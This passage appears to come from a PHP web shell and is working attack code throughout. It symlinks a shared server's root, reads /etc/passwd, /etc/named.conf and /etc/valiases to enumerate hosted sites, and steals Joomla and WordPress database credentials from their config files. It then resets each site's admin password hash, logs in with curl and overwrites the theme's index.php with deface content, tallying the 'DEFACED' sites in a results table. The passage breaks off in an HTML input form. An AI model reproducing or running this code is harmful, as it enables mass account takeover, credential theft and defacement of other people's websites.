2470. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$user['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2471. }
2472. }
2473. }
2474. }
2475.  
2476. }
2477. echo "<center>Total Domains Found: ".$i."</center><br />";
2478. }
2479.  
2480. break;
2481. #################END
2482.  
2483. }
2484. }
2485.  
2486. ?>
2487. <?php
2488.  
2489.  
2490. // getting info from inside :)
2491. function tunisia($text,$bideya,$niheya,$i=1){
2492. $ar0=explode($bideya, $text);
2493. $ar1=explode($niheya, $ar0[$i]);
2494. return trim($ar1[0]);
2495. }
2496.  
2497. function randomt() {
2498. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
2499. srand((double)microtime()*1000000);
2500. $i = 0;
2501. $pass = '';
2502. while ($i <= 7) {
2503. $num = rand() % 33;
2504. $tmp = substr($chars, $num, 1);
2505. $pass = $pass . $tmp;
2506. $i++;
2507. }
2508. return $pass;
2509. }
2510.  
2511. // joomla index changer
2512. function index_changer_joomla($conf, $content, $domain) {
2513. $doler = '$';
2514. $username = tunisia($conf, $doler."user = '", "';");
2515. $password = tunisia($conf, $doler."password = '", "';");
2516. $dbname = tunisia($conf, $doler."db = '", "';");
2517. $prefix = tunisia($conf, $doler."dbprefix = '", "';");
2518. $host = tunisia($conf, $doler."host = '","';");
2519. $co=randomt();
2520. $site_url = "http://".$domain."/administrator";
2521. $output = '';
2522. $cond = 0;
2523. $link=mysql_connect($host, $username, $password);
2524. if($link) {
2525. mysql_select_db($dbname,$link) ;
2526. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '71a4d4cd2f30b185d707718273b17d05', `usertype` = 'Super Administrator', `block` = 0");
2527. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
2528. } else {
2529. $output.= "[-] DB Error<br />";
2530. }
2531.  
2532. if($req1){
2533. if ($req) {
2534. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
2535. $data = mysql_fetch_array($req);
2536. $template_name = $data["template"];
2537.  
2538. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
2539. $data = mysql_fetch_array($req);
2540. $template_id = $data["extension_id"];
2541.  
2542. $url2=$site_url."/index.php";
2543. $ch = curl_init();
2544. curl_setopt($ch, CURLOPT_URL, $url2);
2545. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2546. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2547. curl_setopt($ch, CURLOPT_HEADER, 0);
2548. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2549. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2550. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2551. $buffer = curl_exec($ch);
2552. $return = tunisia($buffer ,'<input type="hidden" name="return" value="','"');
2553. $hidden = tunisia($buffer ,'<input type="hidden" name="','" value="1"',4);
2554.  
2555. if($return && $hidden) {
2556. curl_setopt($ch, CURLOPT_URL, $url2);
2557. curl_setopt($ch, CURLOPT_POST, 1);
2558. curl_setopt($ch, CURLOPT_REFERER, $url2);
2559. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
2560. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2561. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2562. curl_setopt($ch, CURLOPT_HEADER, 0);
2563. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2564. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2565. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2566. $buffer = curl_exec($ch);
2567. $pos = strpos($buffer,"com_config");
2568. if($pos === false) {
2569. $output.= "[-] Login Error<br />";
2570. } else {
2571. $output.= "[+] Login Successful<br />";
2572. }
2573. }
2574. if($pos){
2575. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
2576. $ch = curl_init();
2577. curl_setopt($ch, CURLOPT_URL, $url2);
2578. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2579. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2580. curl_setopt($ch, CURLOPT_HEADER, 0);
2581. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2582. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2583. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2584. $buffer = curl_exec($ch);
2585.  
2586. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',2);
2587. if($hidden2) {
2588. $output.= "[+] index.php file found in Theme Editor<br />";
2589. } else {
2590. $output.= "[-] index.php Not found in Theme Editor<br />";
2591. }
2592. }
2593. if($hidden2) {
2594. $url2=$site_url."/index.php?option=com_templates&layout=edit";
2595. $ch = curl_init();
2596. curl_setopt($ch, CURLOPT_URL, $url2);
2597. curl_setopt($ch, CURLOPT_POST, 1);
2598. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
2599. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2600. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2601. curl_setopt($ch, CURLOPT_HEADER, 0);
2602. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2603. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2604. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2605. $buffer = curl_exec($ch);
2606. curl_close($ch);
2607.  
2608. $pos = strpos($buffer,'<dd class="message message">');
2609. $cond = 0;
2610. if($pos === false) {
2611. $output.= "[-] Updating Index.php Error<br />";
2612.  
2613. } else {
2614. $output.= "[+] Index.php Template successfully saved<br />";
2615. $cond = 1;
2616. }
2617. }
2618. }
2619. else {
2620. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
2621. $data = mysql_fetch_array($req);
2622. $template_name=$data["template"];
2623. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
2624. $url2=$site_url."/index.php";
2625. $ch = curl_init();
2626. curl_setopt($ch, CURLOPT_URL, $url2);
2627. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2628. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2629. curl_setopt($ch, CURLOPT_HEADER, 0);
2630. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
2631. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2632. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2633. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2634. $buffer = curl_exec($ch);
2635. $hidden=tunisia($buffer ,'<input type="hidden" name="','" value="1"',3);
2636.  
2637. if($hidden) {
2638. curl_setopt($ch, CURLOPT_URL, $url2);
2639. curl_setopt($ch, CURLOPT_POST, 1);
2640. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=jancok&option=com_login&task=login&".$hidden."=1");
2641. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2642. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2643. curl_setopt($ch, CURLOPT_HEADER, 0);
2644. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2645. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2646. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2647. $buffer = curl_exec($ch);
2648. $pos = strpos($buffer,"com_config");
2649. if($pos === false) {
2650. $output.= "[-] Login Error<br />";
2651. } else {
2652. $output.= "[+] Login Successful<br />";
2653. }
2654. }
2655.  
2656. if($pos) {
2657. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
2658. curl_setopt($ch, CURLOPT_URL, $url2);
2659. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2660. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2661. curl_setopt($ch, CURLOPT_HEADER, 0);
2662. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2663. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2664. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2665. $buffer = curl_exec($ch);
2666. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',6);
2667. if($hidden2) {
2668. $output.= "[+] index.php file founded in Theme Editor<br />";
2669. } else {
2670. $output.= "[-] index.php Not found in Theme Editor<br />";
2671. }
2672. }
2673.  
2674. if($hidden2) {
2675. $url2=$site_url."/index.php?option=com_templates&layout=edit";
2676. curl_setopt($ch, CURLOPT_URL, $url2);
2677. curl_setopt($ch, CURLOPT_POST, 1);
2678. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
2679. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2680. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2681. curl_setopt($ch, CURLOPT_HEADER, 0);
2682. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2683. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
2684. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
2685. $buffer = curl_exec($ch);
2686. curl_close($ch);
2687.  
2688. $pos = strpos($buffer,'<dd class="message message fade">');
2689. $cond = 0;
2690. if($pos === false) {
2691. $output.= "[-] Updating Index.php Error<br />";
2692. } else {
2693. $output.= "[+] Index.php Template successfully saved<br />";
2694. $cond = 1;
2695. }
2696. }
2697. }
2698. } else {
2699. $output.= "[-] DB Error<br />";
2700. }
2701. global $base_path;
2702. unlink($base_path.$co);
2703. return array('cond'=>$cond, 'output'=>$output , 'template'=>$template_name);
2704. }
2705.  
2706.  
2707. // wordpress index changer
2708.  
2709. function index_changer_wp($conf, $index) {
2710. $dol = '$';
2711. $preindex = "<?php
2712. ".$dol."def = file_get_contents('".$index."');
2713. ".$dol."p = explode('public_html',dirname(__FILE__));
2714. ".$dol."p = ".$dol."p[0].'public_html';
2715. if (".$dol."handle = opendir(".$dol."p)) {
2716. ".$dol."p1 = @fopen(".$dol."p.'/index.html','w+');
2717. @fwrite(".$dol."fp1, ".$dol."def);
2718. ".$dol."p1 = @fopen(".$dol."p.'/index.php','w+');
2719. @fwrite(".$dol."fp1, ".$dol."def);
2720. ".$dol."fp1 = @fopen(".$dol."p.'/index.htm','w+');
2721. @fwrite(".$dol."fp1, ".$dol."def);
2722. echo 'Done';
2723. }
2724. closedir(".$dol."handle);
2725. unlink(__FILE__);
2726. ?>";
2727. $content = base64_encode($preindex);
2728. $output = '';
2729. $dol = '$';
2730. $go = 0;
2731. $username = tunisia($conf,"define('DB_USER', '","');");
2732. $password = tunisia($conf,"define('DB_PASSWORD', '","');");
2733. $dbname = tunisia($conf,"define('DB_NAME', '","');");
2734. $prefix = tunisia($conf,$dol."table_prefix = '","'");
2735. $host = tunisia($conf,"define('DB_HOST', '","');");
2736.  
2737. $link=mysql_connect($host,$username,$password);
2738. if($link) {
2739. mysql_select_db($dbname,$link) ;
2740. $dol = '$';
2741. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '71a4d4cd2f30b185d707718273b17d05' WHERE `ID` = 1");
2742. } else {
2743. $output.= "[-] DB Error<br />";
2744. }
2745. if($req1) {
2746.  
2747. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
2748. $data = mysql_fetch_array($req);
2749. $site_url=$data["option_value"];
2750.  
2751. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
2752. $data = mysql_fetch_array($req);
2753. $template = $data["option_value"];
2754.  
2755. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
2756. $data = mysql_fetch_array($req);
2757. $current_theme = $data["option_value"];
2758.  
2759. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
2760. $url2=$site_url."/wp-login.php";
2761.  
2762. $ch = curl_init();
2763. curl_setopt($ch, CURLOPT_URL, $url2);
2764. curl_setopt($ch, CURLOPT_POST, 1);
2765. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=jancok&rememberme=forever&wp-submit=Log In&testcookie=1");
2766. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2767. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
2768. curl_setopt($ch, CURLOPT_HEADER, 0);
2769. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
2770. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2771. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2772. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2773. $buffer = curl_exec($ch);
2774.  
2775. $pos = strpos($buffer,"action=logout");
2776. if($pos === false) {
2777. $output.= "[-] Login Error<br />";
2778. } else {
2779. $output.= "[+] Login Successful<br />";
2780. $go = 1;
2781. }
2782. if($go) {
2783. $cond = 0;
2784. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
2785. curl_setopt($ch, CURLOPT_URL, $url2);
2786. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
2787. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
2788. curl_setopt($ch, CURLOPT_HEADER, 0);
2789. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2790. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2791. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2792. $buffer0 = curl_exec($ch);
2793.  
2794. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
2795. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
2796.  
2797. if(substr_count($_file,"/index.php") != 0){
2798. $output.= "[+] index.php loaded in Theme Editor<br />";
2799. $url2=$site_url."/wp-admin/theme-editor.php";
2800. curl_setopt($ch, CURLOPT_URL, $url2);
2801. curl_setopt($ch, CURLOPT_POST, 1);
2802. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
2803. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2804. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2805. curl_setopt($ch, CURLOPT_HEADER, 0);
2806. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2807. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2808. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2809. $buffer = curl_exec($ch);
2810. curl_close($ch);
2811.  
2812. $pos = strpos($buffer,'<div id="message" class="updated">');
2813. if($pos === false) {
2814. $output.= "[-] Updating Index.php Error<br />";
2815. } else {
2816. $output.= "[+] Index.php Updated Successfuly<br />";
2817. $hk = explode('public_html',$_file);
2818. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
2819. $cond = 1;
2820. }
2821. } else {
2822. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
2823. curl_setopt($ch, CURLOPT_URL, $url2);
2824. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
2825. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2826. curl_setopt($ch, CURLOPT_HEADER, 0);
2827. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2828. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2829. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2830. $buffer0 = curl_exec($ch);
2831.  
2832. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
2833. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
2834.  
2835. if(substr_count($_file,"index.php") != 0){
2836. $output.= "[+] index.php loaded in Theme Editor<br />";
2837. $url2=$site_url."/wp-admin/theme-editor.php";
2838. curl_setopt($ch, CURLOPT_URL, $url2);
2839. curl_setopt($ch, CURLOPT_POST, 1);
2840. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
2841. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2842. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2843. curl_setopt($ch, CURLOPT_HEADER, 0);
2844. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
2845. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
2846. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
2847. $buffer = curl_exec($ch);
2848. curl_close($ch);
2849.  
2850. $pos = strpos($buffer,'<div id="message" class="updated">');
2851. if($pos === false) {
2852. $output.= "[-] Updating Index.php Error<br />";
2853. } else {
2854. $output.= "[+] Index.php Template Updated Successfuly<br />";
2855. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
2856. $cond = 1;
2857. }
2858. } else {
2859. $output.= "[-] index.php can not load in Theme Editor<br />";
2860. }
2861. }
2862. }
2863. } else {
2864. $output.= "[-] DB Error<br />";
2865. }
2866. global $base_path;
2867. unlink($base_path.'COOKIE.txt');
2868. return array('cond'=>$cond, 'output'=>$output , 'template'=> $template);
2869. }
2870.  
2871. if($_POST['mode']==2) {
2872. // symlinking
2873. @mkdir('sym',0777);
2874. $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
2875. file_put_contents("sym/.htaccess",$htaccess);
2876. @symlink('/','sym/root');
2877.  
2878.  
2879. // getting sites from (/etc/passwd) file
2880. $named=file_get_contents($base_url.'/sym/root/etc/passwd/');
2881. $ar = explode('<li><a href="', $named);
2882. for($vi=2;$vi < count($ar);$vi++)
2883. {
2884. $var1 = strtok($ar[$vi], " ");
2885. $var1 = substr($var1,0,-2);
2886. $old=('.db');
2887. $new=('');
2888. $sites = str_replace($old , $new , $var1);
2889. file_put_contents('sites.txt',$sites);
2890. }
2891.  
2892. // getting usernames
2893. $domains=file('sites.txt');
2894. foreach ($domains as $domain) {
2895. $order=("ls -la /etc/valiases/".$domain);
2896. $exec=exec($order);
2897. $filename = 'mail.txt';
2898. $fp = fopen($filename, "a+");
2899. $write = fputs($fp, $exec."\n");
2900. fclose($fp);
2901. }
2902.  
2903. $mail=file('mail.txt');
2904. foreach ($mail as $finaldom) {
2905. $user=tunisia($finaldom,"-rw-r----- 1 "," mail");
2906. $site=substr(strstr($finaldom, '/etc/valiases'),14);
2907.  
2908. $filename = 'userdom.txt';
2909. $fp = fopen($filename, "a+");
2910. $write = fputs($fp, $user.":". $site." ");
2911. fclose($fp);
2912.  
2913. }
2914.  
2915. $f=file_get_contents('userdom.txt');
2916. $finals=explode(" ",$f);
2917. foreach ($finals as $final){
2918. $strlen=('6');
2919. $dr=strlen ($final);
2920. if ($dr < $strlen) {
2921. $filename = 'fail.txt';
2922. $fp = fopen($filename, "a");
2923. $write = fputs($fp, $final);
2924. fclose($fp);
2925. }
2926. else {
2927. $filename = 'success.txt';
2928. $fp = fopen($filename, "a");
2929. $write = fputs($fp, $final."\n");
2930. fclose($fp);
2931. }
2932. }
2933.  
2934. // now to work
2935. $index=$_POST['tunisia'];
2936. $url=($base_url);
2937. $a=file($base_url.'/success.txt');
2938. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
2939. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
2940. $khaled = fopen('defaced.html', 'a+');
2941. foreach ($a as $final) {
2942. list($user, $site_url) = explode(":", $final);
2943. $site_urlto = substr($site_url, 0, -1);
2944. // joomla symlinks
2945. $joomla=$url."/sym/root/home/".$user."/public_html/configuration.php";
2946. $joomla2=$url."/sym/root/home/".$user."/public_html/joomla/configuration.php";
2947. $joomla3=$url."/sym/root/home/".$user."/public_html/site/configuration.php";
2948. // wordpress symlinks
2949. $wordpress=$url."/sym/root/home/".$user."/public_html/wp-config.php";
2950. $wordpress2=$url."/sym/root/home/".$user."/public_html/blog/wp-config.php";
2951. $wordpress3=$url."/sym/root/home/".$user."/public_html/wp/wp-config.php";
2952.  
2953. // first joomla guess
2954. if($joomla && preg_match('/dbprefix/i',$joomla)){
2955. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
2956. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
2957. $res = index_changer_joomla($joomla, $index, $site_urlto);
2958. echo '<td>'.$res['output'].'</td>';
2959. if($res['cond']) {
2960. echo '<td align="center"><span class="green">DEFACED</span></td>';
2961. fwrite($khaled, 'http://'.$site_urlto.'/templates/'.$res['template'].'/index.php<br>');
2962. $count1 = $count1+1;
2963. } else {
2964. echo '<td align="center"><span class="blue">FAILED</span></td>';
2965. }
2966. echo '</tr>';
2967. }
2968. // second joomla guess
2969. if($joomla2 && preg_match('/dbprefix/i',$joomla2)){
2970. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
2971. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
2972. $res = index_changer_joomla($joomla2, $index, $site_urlto);
2973. echo '<td>'.$res['output'].'</td>';
2974. if($res['cond']) {
2975. echo '<td align="center"><span class="green">DEFACED</span></td>';
2976. fwrite($khaled, 'http://'.$site_urlto.'/joomla/'.$res['template'].'/index.php<br>');
2977. $count1 = $count1+1;
2978. } else {
2979. echo '<td align="center"><span class="blue">FAILED</span></td>';
2980. }
2981. echo '</tr>';
2982. }
2983. // third joomla guess
2984. if($joomla3 && preg_match('/dbprefix/i',$joomla3)){
2985. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
2986. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
2987. $res = index_changer_joomla($joomla3, $index, $site_urlto);
2988. echo '<td>'.$res['output'].'</td>';
2989. if($res['cond']) {
2990. echo '<td align="center"><span class="green">DEFACED</span></td>';
2991. fwrite($khaled, 'http://'.$site_urlto.'/site/'.$res['template'].'/index.php<br>');
2992. $count1 = $count1+1;
2993. } else {
2994. echo '<td align="center"><span class="blue">FAILED</span></td>';
2995. }
2996. echo '</tr>';
2997. }
2998.  
2999. // first wordpress guess
3000. if($wordpress && preg_match('/DB_NAME/i',$wordpress)){
3001. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
3002. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
3003. $res = index_changer_wp($wordpress, $index);
3004. echo '<td>'.$res['output'].'</td>';
3005. if($res['cond']) {
3006. echo '<td align="center"><span class="green">DEFACED</span></td>';
3007. fwrite($khaled, 'http://'.$site_urlto.'/wp-content/themes/'.$res['template'].'/index.php<br>');
3008. $count2++;
3009. } else {
3010. echo '<td align="center"><span class="blue">FAILED</span></td>';
3011. }
3012. echo '</tr>';
3013. }
3014.  
3015. // second wordpress guess
3016. if($wordpress2 && preg_match('/DB_NAME/i',$wordpress2)){
3017. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
3018. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
3019. $res = index_changer_wp($wordpress2, $index);
3020. echo '<td>'.$res['output'].'</td>';
3021. if($res['cond']) {
3022. echo '<td align="center"><span class="green">DEFACED</span></td>';
3023. fwrite($khaled, 'http://'.$site_urlto.'/blog/wp-content/themes/'.$res['template'].'/index.php<br>');
3024. $count2++;
3025. } else {
3026. echo '<td align="center"><span class="blue">FAILED</span></td>';
3027. }
3028. echo '</tr>';
3029. }
3030.  
3031. // third wordpress guess
3032. if($wordpress3 && preg_match('/DB_NAME/i',$wordpress3)){
3033. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
3034. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
3035. $res = index_changer_wp($wordpress3, $index);
3036. echo '<td>'.$res['output'].'</td>';
3037. if($res['cond']) {
3038. echo '<td align="center"><span class="green">DEFACED</span></td>';
3039. fwrite($khaled, 'http://'.$site_urlto.'/wp/wp-content/themes/'.$res['template'].'/index.php<br>');
3040. $count2++;
3041. } else {
3042. echo '<td align="center"><span class="blue">FAILED</span></td>';
3043. }
3044. echo '</tr>';
3045. }
3046.  
3047. }
3048. echo '</table>';
3049. echo '<hr/>';
3050. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
3051. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
3052. }
3053.  
3054. elseif($_POST['mode']==1) {
3055. @mkdir('sym',0777);
3056. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
3057. $fp = @fopen ('sym/.htaccess','w');
3058. fwrite($fp, $wr);
3059. @symlink('/','sym/root');
3060. $dominios = @file_get_contents("/etc/named.conf");
3061. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
3062. $out[1] = array_unique($out[1]);
3063. $numero_dominios = count($out[1]);
3064. echo "Total domains: $numero_dominios <br><br />";
3065. $def = $_POST['tunisia'];
3066. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
3067. $output = fopen('defaced.html', 'a+');
3068. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>
3069. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
3070. $j = 1;
3071. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
3072. for($i = $st; $i <= $numero_dominios; $i++)
3073. {
3074. $domain = $out[1][$i];
3075. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
3076. $infos = @posix_getpwuid($dono_arquivo);
3077.  
3078. if($infos['name']!='root') {
3079. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
3080. $config001 = @file_get_contents($base_url.$infos['name']."/public_html/joomla/configuration.php");
3081. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
3082. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
3083.  
3084. if($config001 && preg_match('/dbprefix/i',$config001)){
3085. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
3086. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
3087. $res = index_changer_joomla($config001, $def, $domain);
3088. echo '<td>'.$res['output'].'</td>';
3089. if($res['cond']) {
3090. echo '<td align="center"><span class="green">DEFACED</span></td>';
3091. fwrite($output, 'http://'.$domain."<br>");
3092. $count1 = $count+1;
3093. } else {
3094. echo '<td align="center"><span class="blue">FAILED</span></td>';
3095. }
3096. echo '</tr>';
3097. }
3098.  
3099. if($config01 && preg_match('/dbprefix/i',$config01)){
3100. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
3101. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
3102. $res = index_changer_joomla($config01, $def, $domain);
3103. echo '<td>'.$res['output'].'</td>';
3104. if($res['cond']) {
3105. echo '<td align="center"><span class="green">DEFACED</span></td>';
3106. fwrite($output, 'http://'.$domain."<br>");
3107. $count1 = $count+1;
3108. } else {
3109. echo '<td align="center"><span class="blue">FAILED</span></td>';
3110. }
3111. echo '</tr>';
3112. }
3113.  
3114. if($config02 && preg_match('/DB_NAME/i',$config02)){
3115. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
3116. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
3117. $res = index_changer_wp($config02, $def);
3118. echo '<td>'.$res['output'].'</td>';
3119. if($res['cond']) {
3120. echo '<td align="center"><span class="green">DEFACED</span></td>';
3121. fwrite($output, 'http://'.$domain."<br>");
3122. $count2 = $count2+1;
3123. } else {
3124. echo '<td align="center"><span class="blue">FAILED</span></td>';
3125. }
3126. echo '</tr>';
3127. }
3128. if($config03 && preg_match('/DB_NAME/i',$config03)){
3129. echo '<tr><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
3130. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
3131. $res = index_changer_wp($config03, $def);
3132. echo '<td>'.$res['output'].'</td>';
3133. if($res['cond']) {
3134. echo '<td align="center"><span class="green">DEFACED</span></td>';
3135. fwrite($output, 'http://'.$domain."<br>");
3136. $count2 = $count2+1;
3137. } else {
3138. echo '<td align="center"><span class="blue">FAILED</span></td>';
3139. }
3140. echo '</tr>';
3141. }
3142. }
3143. }
3144. echo '</table>';
3145. echo '<hr/>';
3146. echo 'Total Defaced = '.$count1 + $count2.' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
3147. echo '<a href="defaced.html" target="_blank">Show All</a><br />';
3148. }
3149. else {
3150.  
3151. echo '
3152. <table>
3153.  
3154. <form method="post">
3155. <tr>
3156. <td>index url : </td>
